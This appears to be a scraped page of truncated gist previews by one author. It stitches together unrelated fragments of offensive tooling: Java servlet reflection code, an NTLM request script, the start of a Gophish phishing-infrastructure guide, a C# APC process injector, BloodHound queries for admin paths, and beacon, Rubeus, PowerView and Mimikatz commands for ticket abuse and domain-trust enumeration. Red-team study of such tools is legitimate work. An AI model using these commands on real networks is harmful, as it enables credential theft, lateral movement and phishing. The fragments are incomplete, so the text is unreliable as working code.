Ridter

//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd

import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashSet;
import java.util.Scanner;

Ridter

//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Field;
import java.util.HashSet;
import java.util.Scanner;

public class a {

Ridter

//Author:fnmsd
//Blog:https://blog.csdn.net/fnmsd
package aa;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.PrintWriter;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.HashSet;

Ridter

import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

Ridter

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+

Ridter

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

Ridter

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

Ridter

MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH 
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,

Ridter

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

Ridter

# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1

# map all reachable domain trusts
Invoke-MapDomainTrust

# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName